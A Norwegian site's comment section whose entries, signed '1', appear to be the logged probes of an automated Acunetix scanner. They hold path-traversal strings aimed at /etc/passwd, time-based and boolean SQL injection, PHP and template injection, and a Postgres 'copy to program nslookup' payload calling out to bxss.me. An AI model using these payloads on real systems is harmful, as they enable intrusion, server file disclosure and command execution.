././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
  290. 1 1 17:57 12/09/17
    file:///etc/passwd
  291. 1 1 17:57 12/09/17
  292. 1 1 17:57 12/09/17
    /\../\../\../\../\../\../\../etc/passwd
  293. 1 1 17:57 12/09/17
  294. 1 1 17:57 12/09/17
    WEB-INF/web.xml
  295. 1 1 17:57 12/09/17
  296. 1 1 17:57 12/09/17
  297. 1 1 17:57 12/09/17
  298. 1 1 17:57 12/09/17
    /WEB-INF/web.xml
  299. 1 1 17:57 12/09/17
  300. 1 1 17:57 12/09/17
  301. 1 1 17:58 12/09/17
  302. 1 1 17:58 12/09/17
    WEB-INF\web.xml
  303. 1 1 17:58 12/09/17
  304. 1 1 17:58 12/09/17
  305. 1 1 17:58 12/09/17
  306. 1 1 17:58 12/09/17
    '"()
  307. 1 1 17:58 12/09/17
  308. 1 1 17:58 12/09/17
  309. 1 1 17:58 12/09/17
  310. 1 1 17:58 12/09/17
  311. 1 1 17:58 12/09/17
  312. 1 1 17:58 12/09/17
  313. 1 1 17:58 12/09/17
  314. 1 1 17:58 12/09/17
  315. 1 1 17:58 12/09/17
  316. 1 1 17:58 12/09/17
  317. 1 1 17:58 12/09/17
  318. 1 1 17:58 12/09/17
  319. 1 1 17:58 12/09/17
  320. 1 1 17:59 12/09/17
  321. 1 1 17:59 12/09/17
  322. 1 1 17:59 12/09/17
  323. 1 1 17:59 12/09/17
  324. 1 1 17:59 12/09/17
  325. 1 1 17:59 12/09/17
  326. 1 1 17:59 12/09/17
  327. 1 1 17:59 12/09/17
  328. 1 1 17:59 12/09/17
  329. 1 1 17:59 12/09/17
  330. 1 1 17:59 12/09/17
  331. 1 1 17:59 12/09/17
  332. 1 1 17:59 12/09/17
  333. 1 1 17:59 12/09/17
  334. 1 1 17:59 12/09/17
  335. 1 1 17:59 12/09/17
  336. 1 1 18:00 12/09/17
  337. 1 1 18:00 12/09/17
  338. 1 1 18:00 12/09/17
  339. 1 1 18:00 12/09/17
  340. 1 1 18:00 12/09/17
  341. 1 1 18:00 12/09/17
  342. 1 1 18:00 12/09/17
  343. 1 1 18:00 12/09/17
  344. 1 1 18:00 12/09/17
  345. 1 1 18:00 12/09/17
  346. 1 1 18:00 12/09/17
  347. 1 1 18:00 12/09/17
  348. 1 1 18:00 12/09/17
  349. 1 1 18:00 12/09/17
  350. 1 1 18:00 12/09/17
  351. 1 1 18:01 12/09/17
    1
  352. 1 1 18:01 12/09/17
    1
  353. 1 1 18:01 12/09/17
  354. 1 1 18:01 12/09/17
    -1 OR 2+983-983-1=0+0+0+1 --
  355. 1 1 18:01 12/09/17
    -1 OR 3+983-983-1=0+0+0+1 --
  356. 1 1 18:01 12/09/17
  357. 1 1 18:01 12/09/17
    -1 OR 3*2
  358. 1 1 18:01 12/09/17
  359. 1 1 18:01 12/09/17
    -1 OR 3*2>(0+5+983-983) --
  360. 1 1 18:01 12/09/17
  361. 1 1 18:01 12/09/17
    -1 OR 2+428-428-1=0+0+0+1
  362. 1 1 18:01 12/09/17
    http://testasp.vulnweb.com/t/xss.html?%00.jpg
  363. 1 1 18:01 12/09/17
    -1 OR 3+428-428-1=0+0+0+1
  364. 1 1 18:01 12/09/17
  365. 1 1 18:02 12/09/17
    -1 OR 3*2
  366. 1 1 18:02 12/09/17
  367. 1 1 18:02 12/09/17
    -1 OR 3*2>(0+5+428-428)
  368. 1 1 18:02 12/09/17
  369. 1 1 18:02 12/09/17
    -1' OR 2+249-249-1=0+0+0+1 --
  370. 1 1 18:02 12/09/17
    -1' OR 3+249-249-1=0+0+0+1 --
  371. 1 1 18:02 12/09/17
  372. 1 1 18:02 12/09/17
    -1' OR 3*2
  373. 1 1 18:02 12/09/17
    ;print(md5(acunetix_wvs_security_test));
  374. 1 1 18:02 12/09/17
    -1' OR 3*2>(0+5+249-249) --
  375. 1 1 18:02 12/09/17
    ';print(md5(acunetix_wvs_security_test));$a='
  376. 1 1 18:02 12/09/17
    ";print(md5(acunetix_wvs_security_test));$a="
  377. 1 1 18:03 12/09/17
    -1' OR 2+181-181-1=0+0+0+1 or 'euGS712G'='
  378. 1 1 18:03 12/09/17
    -1' OR 3+181-181-1=0+0+0+1 or 'euGS712G'='
  379. 1 1 18:03 12/09/17
    -1' OR 3*2
  380. 1 1 18:03 12/09/17
  381. 1 1 18:03 12/09/17
    ${@print(md5(acunetix_wvs_security_test))}
  382. 1 1 18:03 12/09/17
  383. 1 1 18:03 12/09/17
  384. 1 1 18:03 12/09/17
    -1' OR 3*2>(0+5+181-181) or 'euGS712G'='
  385. 1 1 18:03 12/09/17
    ${@print(md5(acunetix_wvs_security_test))}\
  386. 1 1 18:03 12/09/17
  387. 1 1 18:03 12/09/17
    -1" OR 2+678-678-1=0+0+0+1 --
  388. 1 1 18:03 12/09/17
  389. Kjekk Kjekk 18:03 12/09/17
  390. 1 1 18:04 12/09/17
  391. 1 1 18:04 12/09/17
    -1" OR 3+678-678-1=0+0+0+1 --
  392. 1 1 18:04 12/09/17
  393. 1 1 18:04 12/09/17
  394. 1 1 18:04 12/09/17
  395. 1 1 18:04 12/09/17
  396. 1 1 18:04 12/09/17
  397. 1 1 18:04 12/09/17
    -1" OR 3*2
  398. 1 1 18:04 12/09/17
  399. 1 1 18:04 12/09/17
    2294
  400. 1 1 18:04 12/09/17
  401. 1 1 18:04 12/09/17
    -1" OR 3*2>(0+5+678-678) --
  402. 1 1 18:04 12/09/17
    if(now()=sysdate(),sleep(57.75),0)/*'XOR(if(now()=sysdate(),sleep(57.75),0))OR'"XOR(if(now()=sysdate(),sleep(57.75),0))OR"*/
  403. 1 1 18:04 12/09/17
    2294
  404. 1 1 18:04 12/09/17
    (select(0)from(select(sleep(57.75)))v)/*'+(select(0)from(select(sleep(57.75)))v)+'"+(select(0)from(select(sleep(57.75)))v)+"*/
  405. 1 1 18:04 12/09/17
    -1; waitfor delay '0:0:19.25' --
  406. 1 1 18:05 12/09/17
    -1); waitfor delay '0:0:19.25' --
  407. 1 1 18:05 12/09/17
  408. 1 1 18:05 12/09/17
    2294/.
  409. 1 1 18:05 12/09/17
    http://hit5007gq7e6n.bxss.me/
  410. 1 1 18:05 12/09/17
  411. 1 1 18:05 12/09/17
    1 waitfor delay '0:0:19.25' --
  412. 1 1 18:05 12/09/17
  413. 1 1 18:05 12/09/17
    BeYt4CT3'; waitfor delay '0:0:19.25' --
  414. 1 1 18:05 12/09/17
    -1;select pg_sleep(19.25); --
  415. 1 1 18:05 12/09/17
  416. 1 1 18:05 12/09/17
    -1);select pg_sleep(19.25); --
  417. 1 1 18:05 12/09/17
    -1));select pg_sleep(38.5); --
  418. 1 1 18:05 12/09/17
  419. 1 1 18:05 12/09/17
    NvTvhVwR';select pg_sleep(38.5); --
  420. 1 1 18:05 12/09/17
    0O996pn5');select pg_sleep(38.5); --
  421. 1 1 18:05 12/09/17
    lLScqb0V'));select pg_sleep(38.5); --
  422. 1 1 18:06 12/09/17
    1||UTL_INADDR.get_host_address('dns.'||'sqli.018373.74-8447.74.9405d.1.bxss'||'.me')
  423. 1 1 18:06 12/09/17
    '||UTL_INADDR.get_host_address('dns.'||'sqli.018373.74-8448.74.9405d.1.bxss'||'.me')||'
  424. 1 1 18:06 12/09/17
  425. 1 1 18:06 12/09/17
    1;copy (select '') to program 'nslookup dns.sqli.\018373.74-8449.74.9405d.\1.bxss.me'
  426. 1 1 18:06 12/09/17
  427. 1 1 18:06 12/09/17
    1';copy (select '') to program 'nslookup dns.sqli.\018373.74-8450.74.9405d.\1.bxss.me
  428. 1 1 18:06 12/09/17
    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  429. 1 1 18:06 12/09/17
  430. 1 1 18:06 12/09/17
    500'
  431. 1 1 18:06 12/09/17
  432. 1 1 18:07 12/09/17
  433. 1 1 18:07 12/09/17
  434. 1 1 18:07 12/09/17
  435. 1 1 18:07 12/09/17
  436. 1 1 18:07 12/09/17
  437. 1 1 18:07 12/09/17
  438. 1 1 18:07 12/09/17
  439. 1 1 18:07 12/09/17
  440. 1 1 18:07 12/09/17
  441. 1 1 18:08 12/09/17
  442. 1 1 18:08 12/09/17
  443. 1 1 18:08 12/09/17
  444. 1 1 18:08 12/09/17
  445. 1 1 18:08 12/09/17
  446. 1 1 18:08 12/09/17
  447. 1 1 18:08 12/09/17
  448. 1 1 18:08 12/09/17
  449. 1 1 18:08 12/09/17
  450. 1 1 18:08 12/09/17
  451. 1 1 18:08 12/09/17
  452. 1 1 18:09 12/09/17
  453. 1 1 18:09 12/09/17
    /www.vulnweb.com
  454. 1 1 18:09 12/09/17
  455. 1 1 18:09 12/09/17
  456. 1 1 18:09 12/09/17
  457. 1 1 18:09 12/09/17
  458. 1 1 18:09 12/09/17
    978970
  459. 1 1 18:09 12/09/17
  460. 1 1 18:09 12/09/17
    http://www.vulnweb.com
  461. 1 1 18:10 12/09/17
  462. 1 1 18:10 12/09/17
  463. 1 1 18:10 12/09/17
  464. 1 1 18:10 12/09/17
  465. 1 1 18:10 12/09/17
  466. 1 1 18:10 12/09/17
  467. 1 1 18:10 12/09/17
  468. 1 1 18:10 12/09/17
  469. 1 1 18:10 12/09/17
    1'"
  470. 1 1 18:10 12/09/17
    //www.vulnweb.com
  471. 1 1 18:10 12/09/17
  472. 1 1 18:10 12/09/17
    \
  473. 1 1 18:10 12/09/17
  474. 1 1 18:10 12/09/17
    //www.vulnweb.com
  475. 1 1 18:10 12/09/17
  476. 1 1 18:10 12/09/17
    /\www.vulnweb.com
  477. 1 1 18:10 12/09/17
    1????%2527%2522
  478. 1 1 18:10 12/09/17
    @@ObMLZ
  479. 1 1 18:11 12/09/17
  480. 1 1 18:11 12/09/17
  481. 1 1 18:11 12/09/17
  482. 1 1 18:11 12/09/17
  483. 1 1 18:11 12/09/17
  484. 1 1 18:11 12/09/17
  485. 1 1 18:11 12/09/17
  486. 1 1 18:11 12/09/17
  487. 1 1 18:11 12/09/17
    JyI=
  488. 1 1 18:11 12/09/17
    JyI=
  489. 1 1 18:11 12/09/17
    ?'?"
  490. 1 1 18:11 12/09/17
  491. 1 1 18:11 12/09/17
    ?''?""
  492. 1 1 18:11 12/09/17
  493. 1 1 18:12 12/09/17
  494. 1 1 18:12 12/09/17
  495. 1 1 18:12 12/09/17
  496. 1 1 18:12 12/09/17
  497. 1 1 18:12 12/09/17
  498. 1 1 18:12 12/09/17
  499. 1 1 18:12 12/09/17
  500. 1 1 18:12 12/09/17
  501. 1 1 18:12 12/09/17
  502. 1 1 18:12 12/09/17
  503. 1 1 18:12 12/09/17
  504. 1 1 18:12 12/09/17
  505. 1 1 18:12 12/09/17
  506. 1 1 18:12 12/09/17
  507. 1 1 18:12 12/09/17
    '"
  508. 1 1 18:12 12/09/17
  509. 1 1 18:13 12/09/17
  510. 1 1 18:13 12/09/17
  511. 1 1 18:13 12/09/17
  512. 1 1 18:13 12/09/17
  513. 1 1 18:13 12/09/17
  514. 1 1 18:14 12/09/17
  515. 1 1 18:14 12/09/17
  516. 1 1 18:14 12/09/17
  517. 1 1 18:15 12/09/17
  518. 1 1 18:15 12/09/17
  519. 1 1 18:15 12/09/17
  520. 1 1 18:15 12/09/17
    1'"()&%WAFx(9466)
  521. 1 1 18:15 12/09/17
    '"()&%WAFx(9694)
  522. 1 1 18:15 12/09/17
    19234911
  523. 1 1 18:16 12/09/17
    acu1261?s1?s2?s3?uca1261
  524. 1 1 18:16 12/09/17
    acux10420??z1??z2a?bcxuca10420
  525. 1 1 18:16 12/09/17
    CWS000x?=?1N?@E???I)?@?? ?HiP"D?F? G&?7????rX;!S???????7Jq???.?>?p?c?l??zG??M?dkj?,??(??T?Jj)?"?T7$??H?D6)? x)????\C?|?Q?Nc?b? b_&?5 h??g?
    ]s??0Q?L
  526. 1 1 18:16 12/09/17
    {{9999003*9999115}}
  527. 1 1 18:16 12/09/17
    1WAFx(9247)
  528. 1 1 18:16 12/09/17
    1OP4BO[!+!]
  529. 1 1 18:16 12/09/17
    1WAFx(9125)
  530. 1 1 18:16 12/09/17
    1WAFx(9738)
  531. 1 1 18:17 12/09/17
    1WAFx(9475)
  532. 1 1 18:17 12/09/17
    1
  533. 1 1 18:17 12/09/17
    1WAFx(9547)
  534. 1 1 18:17 12/09/17
    1
  535. 1 1 18:17 12/09/17
    1
  536. 1 1 18:17 12/09/17
    1
  537. 1 1 18:17 12/09/17
    1
  538. 1 1 18:17 12/09/17
    1
  539. 1 1 18:17 12/09/17
    1
  540. 1 1 18:17 12/09/17
  541. 1 1 18:18 12/09/17
  542. 1 1 18:18 12/09/17
Skriv en kommentar:

Du må være logget inn for å skrive en kommentar.

Hopp over innlogging - Til hovedinnhold - Topp

Logg inn

Logg inn

Registrer deg

Hopp over seksjon - Til hovedinnhold - Topp

Topp